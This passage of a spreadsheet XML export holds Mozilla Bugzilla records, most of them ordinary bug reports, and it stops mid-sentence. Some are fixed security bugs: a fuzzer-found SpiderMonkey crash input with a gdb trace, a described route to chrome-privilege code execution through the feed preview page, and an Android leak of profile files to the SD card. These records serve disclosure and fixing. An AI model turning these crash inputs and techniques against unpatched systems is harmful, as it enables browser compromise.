    <row r="3574">
      <c r="A3574" t="n">
        <v>1791520</v>
      </c>
      <c r="B3574" t="inlineStr">
        <is>
          <t>2022-09-20 01:35:29 -0700</t>
        </is>
      </c>
      <c r="C3574" t="inlineStr">
        <is>
          <t>Nullptr dereference in IsWriteableAddress when coming from CreateBigIntFromInt64</t>
        </is>
      </c>
      <c r="D3574" t="inlineStr">
        <is>
          <t>2023-01-20 05:13:26 -0800</t>
        </is>
      </c>
      <c r="E3574" t="n">
        <v>1</v>
      </c>
      <c r="F3574" t="n">
        <v>1</v>
      </c>
      <c r="G3574" t="n">
        <v>3</v>
      </c>
      <c r="H3574" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3574" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3574" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3574" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3574" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3574" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3574" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3574" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3574" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main106+][adv-esr102.4+]</t>
        </is>
      </c>
      <c r="Q3574" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3574" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3574" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3574" t="n">
        <v>1</v>
      </c>
      <c r="U3574" t="n">
        <v>0</v>
      </c>
      <c r="V3574" t="n">
        <v>25</v>
      </c>
      <c r="W3574" t="inlineStr">
        <is>
          <t>The following sample will cause a nullptr dereference in Spidermonkey built from current HEAD:
```
function main() {
const v19 = async (v20,v21,v22) =&gt; {
};
for (let v26 = 0; v26 &lt; 100; v26++) {
    const v27 = v19();
    const v28 = v27.finally();
    for (const v30 in this) {
        const v33 = "function".trimLeft(-992713.7098905144,"function");
        const v34 = v33.startsWith("function");
        const v37 = this.BigInt64Array;
        const v38 = new v37(2);
        const v39 = v38[1];
        continue;
    }
}
gc();
}
main();
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
```
Here is the stacktrace from gdb:
```
Thread 1 "js" received signal SIGSEGV, Segmentation fault.
0x0000555558176292 in IsWriteableAddress (ptr=0x0) at js/src/gc/Nursery.cpp:771
771       *vPtr = *vPtr;
(gdb) bt
#0  0x0000555558176292 in IsWriteableAddress (ptr=0x0) at js/src/gc/Nursery.cpp:771
#1  0x0000555558176175 in js::Nursery::forwardBufferPointer (this=0x7ffff771b138, pSlotsElems=0x7fffffff9aa8) at js/src/gc/Nursery.cpp:800
#2  0x000055555887cc82 in js::jit::UpdateIonJSFrameForMinorGC (rt=0x7ffff7718000, frame=...) at js/src/jit/JitFrames.cpp:1055
#3  0x000055555887ca1a in js::jit::UpdateJitActivationsForMinorGC (rt=0x7ffff7718000) at js/src/jit/JitFrames.cpp:1392
#4  0x0000555558177ad4 in js::Nursery::doCollection (this=0x7ffff771b138, reason=JS::GCReason::OUT_OF_NURSERY) at js/src/gc/Nursery.cpp:1265
#5  0x00005555581772df in js::Nursery::collect (this=0x7ffff771b138, options=JS::GCOptions::Normal, reason=JS::GCReason::OUT_OF_NURSERY) at js/src/gc/Nursery.cpp:1114
#6  0x00005555581020d5 in js::gc::GCRuntime::collectNursery (this=0x7ffff7718768, options=JS::GCOptions::Normal, reason=JS::GCReason::OUT_OF_NURSERY, phase=js::gcstats::PhaseKind::MINOR_GC) at js/src/gc/GC.cpp:4268
#7  0x00005555581056e3 in js::gc::GCRuntime::minorGC (this=0x7ffff7718768, reason=JS::GCReason::OUT_OF_NURSERY, phase=js::gcstats::PhaseKind::MINOR_GC) at js/src/gc/GC.cpp:4240
#8  0x000055555811151a in js::gc::GCRuntime::tryNewNurseryBigInt&lt;(js::AllowGC)1&gt; (this=0x7ffff7718768, cx=0x7ffff772a100, thingSize=16, kind=js::gc::AllocKind::BIGINT) at js/src/gc/Allocator.cpp:263
#9  0x0000555558111241 in js::gc::detail::AllocateBigInt&lt;(js::AllowGC)1&gt; (cx=0x7ffff772a100, heap=js::gc::DefaultHeap) at js/src/gc/Allocator.cpp:302
#10 0x000055555766ca10 in js::gc::CellAllocator::NewCell&lt;JS::BigInt, (js::AllowGC)1, js::gc::InitialHeap&amp;&gt; (cx=0x7ffff772a100, args=@0x7fffffff99a7: js::gc::DefaultHeap) at js/src/gc/Allocator.h:120
#11 0x000055555766431d in JSContext::newCell&lt;JS::BigInt, (js::AllowGC)1, js::gc::InitialHeap&amp;&gt; (this=0x7ffff772a100, args=@0x7fffffff99a7: js::gc::DefaultHeap) at js/src/vm/JSContext.h:267
#12 0x000055555764fa7e in JS::BigInt::createUninitialized (cx=0x7ffff772a100, digitLength=0, isNegative=false, heap=js::gc::DefaultHeap) at js/src/vm/BigIntType.cpp:146
#13 0x00005555576500f5 in JS::BigInt::zero (cx=0x7ffff772a100, heap=js::gc::DefaultHeap) at js/src/vm/BigIntType.cpp:212
#14 0x0000555557655c56 in JS::BigInt::createFromUint64 (cx=0x7ffff772a100, n=0) at js/src/vm/BigIntType.cpp:1755
#15 0x0000555557655cbb in JS::BigInt::createFromInt64 (cx=0x7ffff772a100, n=0) at js/src/vm/BigIntType.cpp:1780
#16 0x0000555558478d2d in js::jit::CreateBigIntFromInt64 (cx=0x7ffff772a100, i64=0) at js/src/jit/VMFunctions.cpp:2141
```
I don't believe this issue has security impact, but am marking it as a security issue as a precaution.</t>
        </is>
      </c>
      <c r="X3574" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3575">
      <c r="A3575" t="n">
        <v>226682</v>
      </c>
      <c r="B3575" t="inlineStr">
        <is>
          <t>2003-11-24 14:24:17 -0800</t>
        </is>
      </c>
      <c r="C3575" t="inlineStr">
        <is>
          <t>Editing series doesn't work</t>
        </is>
      </c>
      <c r="D3575" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:37 -0800</t>
        </is>
      </c>
      <c r="E3575" t="n">
        <v>1</v>
      </c>
      <c r="F3575" t="n">
        <v>1</v>
      </c>
      <c r="G3575" t="n">
        <v>4</v>
      </c>
      <c r="H3575" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3575" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3575" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K3575" t="inlineStr">
        <is>
          <t>2.17.3</t>
        </is>
      </c>
      <c r="L3575" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3575" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3575" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3575" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3575" t="inlineStr"/>
      <c r="Q3575" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3575" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3575" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3575" t="n">
        <v>1</v>
      </c>
      <c r="U3575" t="n">
        <v>0</v>
      </c>
      <c r="V3575" t="n">
        <v>10</v>
      </c>
      <c r="W3575" t="inlineStr">
        <is>
          <t>Hmm. It appears I forgot to implement this...
Gerv</t>
        </is>
      </c>
      <c r="X3575" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3576">
      <c r="A3576" t="n">
        <v>595569</v>
      </c>
      <c r="B3576" t="inlineStr">
        <is>
          <t>2010-09-11 17:47:22 -0700</t>
        </is>
      </c>
      <c r="C3576" t="inlineStr">
        <is>
          <t>Deleting a product/component throws an error</t>
        </is>
      </c>
      <c r="D3576" t="inlineStr">
        <is>
          <t>2010-10-18 14:24:23 -0700</t>
        </is>
      </c>
      <c r="E3576" t="n">
        <v>1</v>
      </c>
      <c r="F3576" t="n">
        <v>1</v>
      </c>
      <c r="G3576" t="n">
        <v>4</v>
      </c>
      <c r="H3576" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3576" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3576" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K3576" t="inlineStr">
        <is>
          <t>4.1</t>
        </is>
      </c>
      <c r="L3576" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3576" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3576" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3576" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3576" t="inlineStr"/>
      <c r="Q3576" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3576" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3576" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T3576" t="n">
        <v>1</v>
      </c>
      <c r="U3576" t="n">
        <v>0</v>
      </c>
      <c r="V3576" t="n">
        <v>10</v>
      </c>
      <c r="W3576" t="inlineStr">
        <is>
          <t>Try to delete a product from editproducts.cgi. In 4.1 only, you get the following error:
 visibility_value_id is not a valid parameter for the Bugzilla::Field::match function.
Traceback:
 at Bugzilla/Object.pm line 445
	Bugzilla::Object::_check_field(...) called at Bugzilla/Object.pm line 228
	Bugzilla::Object::match(...) called at Bugzilla/Field.pm line 256
	Bugzilla::Field::match(...) called at Bugzilla/Field/ChoiceInterface.pm line 113
	Bugzilla::Field::ChoiceInterface::controls_visibility_of_fields(...) called at Bugzilla/Field/ChoiceInterface.pm line 41
	Bugzilla::Field::ChoiceInterface::_check_if_controller(...) called at Bugzilla/Product.pm line 272
	Bugzilla::Product::remove_from_db(...) called at /var/www/html/bugzilla/editproducts.cgi line 235</t>
        </is>
      </c>
      <c r="X3576" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3577">
      <c r="A3577" t="n">
        <v>360529</v>
      </c>
      <c r="B3577" t="inlineStr">
        <is>
          <t>2006-11-12 22:23:16 -0800</t>
        </is>
      </c>
      <c r="C3577" t="inlineStr">
        <is>
          <t>Arbitrary code execution using XSS hole and feed preview page</t>
        </is>
      </c>
      <c r="D3577" t="inlineStr">
        <is>
          <t>2018-12-20 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E3577" t="n">
        <v>1</v>
      </c>
      <c r="F3577" t="n">
        <v>1</v>
      </c>
      <c r="G3577" t="n">
        <v>6</v>
      </c>
      <c r="H3577" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3577" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J3577" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K3577" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3577" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3577" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3577" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3577" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3577" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q3577" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3577" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3577" t="inlineStr">
        <is>
          <t>Firefox 3</t>
        </is>
      </c>
      <c r="T3577" t="n">
        <v>1</v>
      </c>
      <c r="U3577" t="n">
        <v>0</v>
      </c>
      <c r="V3577" t="n">
        <v>62</v>
      </c>
      <c r="W3577" t="inlineStr">
        <is>
          <t>Please see bug 353266.
Array.prototype methods trick (bug 344495) and document.(open|write) trick (bug
346659) and XSS holes (bug 351370, bug 359137) are available on fx2.0. (bug
359137 was already fixed.)
In a feed preview page, an event handler that was registered by content script
can be called by chrome script via elem.doCommand() or elem.dispatchEvent(). 
In this case, the event handler's scripted caller is chrome script.  Thus, an
attacker can run arbitrary code with chrome privileges by using Array.prototype
methods trick or document.write trick.
--
  document.getElementById("handlersMenuList")
   .addEventListener("command", x, true);
  SubscribeHandler._feedWriter.write(window);
   or
  SubscribeHandler._feedWriter
   .QueryInterface(Components.interfaces.nsIObserver)
   .observe({}, "nsPref:changed", "browser.feeds.handler.default");
x() (if x is a function) or x.handleEvent() is called in
FeedWriter._setSelectedHandler() via handlers[0].doCommand(),
selectedAppMenuItem.doCommand() or liveBookmarksMenuItem.doCommand().
  document.getElementById("alwaysUse")
   .addEventListener("CheckboxStateChange", y, true);
  SubscribeHandler._feedWriter.write(window);
   or
  SubscribeHandler._feedWriter
   .QueryInterface(Components.interfaces.nsIObserver)
   .observe({}, "nsPref:changed", "browser.feeds.handler");
y() or y.handleEvent() is called in FeedWriter._setCheckboxCheckedState() via
aCheckbox.dispatchEvent(event).
--
* Fx1.5.0.x is not affected since it does not have feed preview feature.
* The trunk should be exploitable if an XSS hole existed.</t>
        </is>
      </c>
      <c r="X3577" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3578">
      <c r="A3578" t="n">
        <v>761014</v>
      </c>
      <c r="B3578" t="inlineStr">
        <is>
          <t>2012-06-03 12:46:21 -0700</t>
        </is>
      </c>
      <c r="C3578" t="inlineStr">
        <is>
          <t>Out of bounds read in qcms_transform_data_rgb_out_lut_sse2</t>
        </is>
      </c>
      <c r="D3578" t="inlineStr">
        <is>
          <t>2013-05-23 01:20:16 -0700</t>
        </is>
      </c>
      <c r="E3578" t="n">
        <v>1</v>
      </c>
      <c r="F3578" t="n">
        <v>1</v>
      </c>
      <c r="G3578" t="n">
        <v>3</v>
      </c>
      <c r="H3578" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3578" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3578" t="inlineStr">
        <is>
          <t>Graphics: Color Management</t>
        </is>
      </c>
      <c r="K3578" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3578" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3578" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3578" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3578" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3578" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3578" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3578" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3578" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3578" t="n">
        <v>1</v>
      </c>
      <c r="U3578" t="n">
        <v>0</v>
      </c>
      <c r="V3578" t="n">
        <v>27</v>
      </c>
      <c r="W3578" t="inlineStr">
        <is>
          <t>Created attachment 629636
Example profile
I received the following report from Tony Payne at Google
"The attached profiles respectively trigger SIGSEGV when looking up the output value for R, G or B when used as both the input and the output profile for test-transform.c"</t>
        </is>
      </c>
      <c r="X3578" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3579">
      <c r="A3579" t="n">
        <v>1507297</v>
      </c>
      <c r="B3579" t="inlineStr">
        <is>
          <t>2018-11-14 13:29:22 -0800</t>
        </is>
      </c>
      <c r="C3579" t="inlineStr">
        <is>
          <t>request for data science input on Experiments v2 plan of record</t>
        </is>
      </c>
      <c r="D3579" t="inlineStr">
        <is>
          <t>2019-01-24 09:47:26 -0800</t>
        </is>
      </c>
      <c r="E3579" t="n">
        <v>1</v>
      </c>
      <c r="F3579" t="n">
        <v>1</v>
      </c>
      <c r="G3579" t="n">
        <v>5</v>
      </c>
      <c r="H3579" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3579" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J3579" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3579" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3579" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3579" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3579" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3579" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3579" t="inlineStr"/>
      <c r="Q3579" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3579" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3579" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3579" t="n">
        <v>1</v>
      </c>
      <c r="U3579" t="n">
        <v>0</v>
      </c>
      <c r="V3579" t="n">
        <v>3</v>
      </c>
      <c r="W3579" t="inlineStr">
        <is>
          <t>Brief description of the request:
I'd like to collaborate with a representative of data science to spec out:
* the interface between data science and experiments infrastructure
* documentation data scientists need for designing experiments
* expectations for how engineering will be involved in the experimental design process
Link to any assets:
This will inform a plan of record that is not ready for wider review, yet, but can be linked here later.
Is there a specific data scientist you would like or someone who has helped to triage this request:
Ryan Harter, given his previous experience with experimentation.</t>
        </is>
      </c>
      <c r="X3579" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3580">
      <c r="A3580" t="n">
        <v>48758</v>
      </c>
      <c r="B3580" t="inlineStr">
        <is>
          <t>2000-08-12 11:00:39 -0700</t>
        </is>
      </c>
      <c r="C3580" t="inlineStr">
        <is>
          <t>text input handling is so slow on linux that it is unusable</t>
        </is>
      </c>
      <c r="D3580" t="inlineStr">
        <is>
          <t>2001-09-12 00:43:03 -0700</t>
        </is>
      </c>
      <c r="E3580" t="n">
        <v>1</v>
      </c>
      <c r="F3580" t="n">
        <v>1</v>
      </c>
      <c r="G3580" t="n">
        <v>3</v>
      </c>
      <c r="H3580" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3580" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3580" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K3580" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3580" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3580" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3580" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3580" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3580" t="inlineStr">
        <is>
          <t>[nsbeta3+][p:1][PDTP1]FIX IN, RE-TESTING</t>
        </is>
      </c>
      <c r="Q3580" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3580" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3580" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T3580" t="n">
        <v>1</v>
      </c>
      <c r="U3580" t="n">
        <v>1</v>
      </c>
      <c r="V3580" t="n">
        <v>24</v>
      </c>
      <c r="W3580" t="inlineStr">
        <is>
          <t>any text box including this description box and url box on the tool bar does not
show the text entered right a way.  I don't remember since when but it's got
slower with in last a few weeks?
This mozilla is checked out last night.</t>
        </is>
      </c>
      <c r="X3580" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3581">
      <c r="A3581" t="n">
        <v>414735</v>
      </c>
      <c r="B3581" t="inlineStr">
        <is>
          <t>2008-01-29 18:13:18 -0800</t>
        </is>
      </c>
      <c r="C3581" t="inlineStr">
        <is>
          <t>New application details window spewing errors</t>
        </is>
      </c>
      <c r="D3581" t="inlineStr">
        <is>
          <t>2008-02-18 11:25:51 -0800</t>
        </is>
      </c>
      <c r="E3581" t="n">
        <v>1</v>
      </c>
      <c r="F3581" t="n">
        <v>1</v>
      </c>
      <c r="G3581" t="n">
        <v>2</v>
      </c>
      <c r="H3581" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3581" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3581" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K3581" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3581" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3581" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3581" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3581" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3581" t="inlineStr"/>
      <c r="Q3581" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3581" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3581" t="inlineStr">
        <is>
          <t>Firefox 3 beta3</t>
        </is>
      </c>
      <c r="T3581" t="n">
        <v>1</v>
      </c>
      <c r="U3581" t="n">
        <v>0</v>
      </c>
      <c r="V3581" t="n">
        <v>10</v>
      </c>
      <c r="W3581" t="inlineStr">
        <is>
          <t>[Spin-off from bug 402252, comment #23]
Ronny Perinke   2008-01-29 14:56:02 PST
If I open the application details for Web-Feed, I get the following two errors.
Fehler: redeclaration of const Cc
Quelldatei: chrome://browser/content/preferences/applications.js
Zeile: 11
Fehler: gApplicationsPane is not defined
Quelldatei: chrome://browser/content/preferences/applicationManager.js
Zeile: 34
It seems that applicationManager.js is loaded before applications.js, because
it defines the constants Ci and Cc. And because of this redeclaration-error,
the 2nd error occurs causing gAppManagerDialog.init to fail.
After commenting out the definitions of const Ci and const Cc
applicationManager.js everything is ok.
My OS is Windows XP. I guess Ci and Cc are not needed at all in
applicationManager.js or it needs an ifdef XP_MACOSX, so that they are only
defined, if they are not in applications.js (note the #ifndef XP_MACOSX there).</t>
        </is>
      </c>
      <c r="X3581" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3582">
      <c r="A3582" t="n">
        <v>1154923</v>
      </c>
      <c r="B3582" t="inlineStr">
        <is>
          <t>2015-04-15 13:59:18 -0700</t>
        </is>
      </c>
      <c r="C3582" t="inlineStr">
        <is>
          <t>Compartment mismatch in js::ScriptSourceObject::initFromOptions</t>
        </is>
      </c>
      <c r="D3582" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3582" t="n">
        <v>1</v>
      </c>
      <c r="F3582" t="n">
        <v>1</v>
      </c>
      <c r="G3582" t="n">
        <v>3</v>
      </c>
      <c r="H3582" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3582" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3582" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3582" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3582" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3582" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3582" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3582" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3582" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q3582" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3582" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3582" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T3582" t="n">
        <v>1</v>
      </c>
      <c r="U3582" t="n">
        <v>0</v>
      </c>
      <c r="V3582" t="n">
        <v>33</v>
      </c>
      <c r="W3582" t="inlineStr">
        <is>
          <t>I found these stacks on crash-stats:
https://crash-stats.mozilla.com/report/index/b543869b-c423-4b63-af9b-b52ad2150412
https://crash-stats.mozilla.com/report/index/e761453d-caab-41e9-a8f9-6cd162150413
This is similar, but the compartment mismatch is happening right after the call to ParseTask::finish():
https://crash-stats.mozilla.com/report/index/130afcfa-408b-4701-a063-882bc2150413
I'm not sure what the cause is.  GlobalHelperThreadState::finishParseTask() calls gc::MergeCompartments() before this.</t>
        </is>
      </c>
      <c r="X3582" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3583">
      <c r="A3583" t="n">
        <v>945429</v>
      </c>
      <c r="B3583" t="inlineStr">
        <is>
          <t>2013-12-02 13:31:21 -0800</t>
        </is>
      </c>
      <c r="C3583" t="inlineStr">
        <is>
          <t>Do not handle file: paths by downloading them</t>
        </is>
      </c>
      <c r="D3583" t="inlineStr">
        <is>
          <t>2024-05-30 08:30:35 -0700</t>
        </is>
      </c>
      <c r="E3583" t="n">
        <v>1</v>
      </c>
      <c r="F3583" t="n">
        <v>1</v>
      </c>
      <c r="G3583" t="n">
        <v>6</v>
      </c>
      <c r="H3583" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3583" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3583" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3583" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3583" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3583" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3583" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3583" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3583" t="inlineStr">
        <is>
          <t>[adv-main28+] bounty nomination for bug 944373 reporter</t>
        </is>
      </c>
      <c r="Q3583" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3583" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3583" t="inlineStr">
        <is>
          <t>Firefox 30</t>
        </is>
      </c>
      <c r="T3583" t="n">
        <v>1</v>
      </c>
      <c r="U3583" t="n">
        <v>0</v>
      </c>
      <c r="V3583" t="n">
        <v>46</v>
      </c>
      <c r="W3583" t="inlineStr">
        <is>
          <t>This is a key aspect of the attack in Bug 944373: a page is loaded which includes an iframe with a src attribute pointing to a file in the profile directory. Firefox responds by downloading the (potentially sensitive) file to the SD card, which is world-readable.</t>
        </is>
      </c>
      <c r="X3583" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3584">
      <c r="A3584" t="n">
        <v>32217</v>
      </c>
      <c r="B3584" t="inlineStr">
        <is>
          <t>2000-03-17 04:38:33 -0800</t>
        </is>
      </c>
      <c r="C3584" t="inlineStr">
        <is>
          <t>buggroup related bug in bugzilla of 02/14/2000 (CVS)</t>
        </is>
      </c>
      <c r="D3584" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E3584" t="n">
        <v>1</v>
      </c>
      <c r="F3584" t="n">
        <v>1</v>
      </c>
      <c r="G3584" t="n">
        <v>4</v>
      </c>
      <c r="H3584" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3584" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3584" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3584" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3584" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3584" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3584" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3584" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3584" t="inlineStr"/>
      <c r="Q3584" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3584" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3584" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T3584" t="n">
        <v>1</v>
      </c>
      <c r="U3584" t="n">
        <v>0</v>
      </c>
      <c r="V3584" t="n">
        <v>9</v>
      </c>
      <c r="W3584" t="inlineStr">
        <is>
          <t>(This is a copy of a e-mail I sent to you two days ago)
Feb 14 2000 I checked out bugzilla from the CVS tree.
I switched both the 'usebuggroups' and 'usebuggroupsentry' options.
My personal groupsettings are such that I can enter bugs in all groups.
From then on I could not enter bugs in our database anymore.
Cause : the SQL query created in post_bug.cgi starting at line 106
